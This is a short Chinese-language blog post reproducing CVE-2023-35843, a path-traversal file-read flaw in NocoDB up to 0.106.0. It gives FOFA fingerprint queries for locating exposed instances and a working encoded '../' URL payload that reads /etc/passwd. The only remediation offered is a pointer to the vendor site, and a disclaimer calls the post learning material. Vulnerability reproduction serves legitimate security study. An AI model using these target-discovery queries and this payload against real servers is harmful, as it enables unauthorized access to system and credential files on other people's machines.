NocoDB任意文件读取漏洞复现

简介

NocoDB是一个开源 Airtable 替代品，可以将 MySql、PostgreSql、Sql Server、Sqlite 和 MariaDb 等转换为智能电子表格。

(CVE-2023-35843) NocoDB 0.106.0版本及之前版本存在安全漏洞。攻击者利用该漏洞可以访问服务器上的任意文件。

漏洞复现

FOFA语法：

icon_hash="-2017596142"

或者

"NocoDB" && (icon_hash="-2017596142" || icon_hash="206985584")

访问后页面如下：

POC：

/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

访问：http://ip:port/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

不存在该漏洞或者访问失败返回如下：

如漏洞存在且未修复则可以直接读取到 /etc/passwd 文件

建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：

https://www.nocodb.com/

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

---

结语

没有人规定，一朵花一定要成长为向日葵或者玫瑰。